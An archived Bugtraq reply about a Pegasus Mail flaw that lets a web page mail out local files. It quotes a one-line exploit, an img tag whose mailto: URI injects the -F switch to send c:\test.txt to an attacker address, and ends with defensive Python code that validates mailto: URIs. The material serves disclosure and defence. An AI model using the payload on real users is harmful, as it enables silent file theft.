[17045] in bugtraq


Re: Pegasus mail file reading vulnerability

daemon@ATHENA.MIT.EDU (George Bakos)
Wed Oct 4 15:03:33 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Message-Id:  <200010041434.KAA08069@rowlf.vtio.org>
Date:         Wed, 4 Oct 2000 10:34:05 -0400
Reply-To: George Bakos <alpinista@BIGFOOT.COM>
From: George Bakos <alpinista@BIGFOOT.COM>
X-To:         Imran Ghory <ImranG@BTINTERNET.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <39DA09DB.32334.36AE40@localhost>

The temporary fix stated by Mr. Ghory affords only a brief dialog
flash.  Not a very good fix.  A better one is to NOT configure
Pegasus to be the default mailer for IE.  This is, unfortunately, a
user-specified option at install time, not the default.  Also, queuing
of outgoing mail allows for pre-delivery review.  A pain, but until
David supplies a fix, this is it.

Be aware, the -F switch will only include a file in the body of a
message; it will NOT attach a binary.  The -B switch will
accomplish this from the command line, but not via IE.  It seems
this is more of an IE mailto: implementation issue than a
Pmail one.  I wonder how many other apps you can pass
command-line options to by exploiting this "feature".

On 3 Oct 00, at 16:31, Imran Ghory wrote:

> SUMMARY
>
> The default setup of Pegasus Mail contains a remotely exploitable security
> hole that allows a remote website to gain copies of files on the user's hard
> drive.
>
> DETAILS
>
> Version tested: Pegasus Mail v3.12c with IE5.0
>
> When the webpage containing the exploit code is viewed using IE5,
> Pegasus Mail will automatically create a message which has a copy
> of the file "c:\test.txt" and is addressed to "hacker@hakersite.com" and
> queues it ready to be sent without any further user intervention.
>
> If instead of "hacker@hakersite.com" we have a local user,
> "hacker" the message won't be queued but just sent immediately.
>
> Exploit code:
>
> <img src="mailto:hacker@hakersite.com -F c:\test.txt">
>
> Temporary Fix:
>
> 1) Don't run Pegasus Mail at the same time as a web browser
>
> This is not a complete solution as Pegasus Mail will load up if the exploit
> code is run, but this at least will be more noticeable to the user.
>
> Vendor:
>
> As I earlier posted a message to vuln-dev giving the basics of this exploit
> without realizing the consequences (at that stage the user had to click on
> a link for the exploit to come into play), I have decided to publish the full
> exploit before contacting the vendor.
>
> --
> Imran Ghory
>


George Bakos - Security Engineer
Electronic Warfare Associates
Information & Infrastructure Technologies
802-338-3213

 To request PGP public key,
 mailto:alpinista@bigfoot.com?subject=sendpubkey
 or http://pgpkeys.mit.edu:11371/
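The root cause in the thread above is a mailto: handler that hands the raw URI target to the mail client's command line, so whitespace-separated text after the address becomes switches such as -F. The following is an added example (not code from Pegasus, IE, or either poster) of the validation a handler could apply before dispatch: percent-decode first, then accept only tokens that are plain addresses and only known header names, rejecting anything else. The address pattern and the allowed header set are assumptions chosen for the example.

```python
import re
from urllib.parse import unquote

# Handler-side validation of a mailto: target before any part of it reaches a
# mail client's command line. Constructed example; not Pegasus or IE code.
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
ALLOWED_HEADERS = {"subject", "body", "cc", "bcc"}  # assumed allow-list


class UnsafeMailtoError(ValueError):
    """Raised when the URI carries anything that is not an address or header."""


def parse_mailto(uri):
    """Return (recipients, headers) or raise UnsafeMailtoError.

    Percent-decoding happens before validation so that an encoded space or
    backslash cannot slip a switch past the address check.
    """
    if uri[:7].lower() != "mailto:":
        raise UnsafeMailtoError("not a mailto: URI")
    to_part, _, query = uri[7:].partition("?")
    recipients = []
    for token in unquote(to_part).split(","):
        token = token.strip()
        if not token:
            continue
        # A whitespace-separated tail such as ' -F c:\test.txt' fails here,
        # because the whole token must be a single address.
        if not ADDR_RE.fullmatch(token):
            raise UnsafeMailtoError("rejected recipient token: %r" % token)
        recipients.append(token)
    headers = {}
    for pair in query.split("&") if query else []:
        key, _, value = pair.partition("=")
        key, value = unquote(key).lower(), unquote(value)
        if key not in ALLOWED_HEADERS:
            raise UnsafeMailtoError("unknown header: %r" % key)
        if "\r" in value or "\n" in value:
            # Line breaks in a header value would let one field inject another.
            raise UnsafeMailtoError("line break in header value")
        headers[key] = value
    return recipients, headers


def is_safe_mailto(uri):
    """Boolean wrapper for the point where the handler is about to dispatch."""
    try:
        parse_mailto(uri)
        return True
    except UnsafeMailtoError:
        return False
```

Validated pieces should then be passed to the mail client as separate arguments rather than re-joined into one command string, so the client never sees user-controlled text in a switch position.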
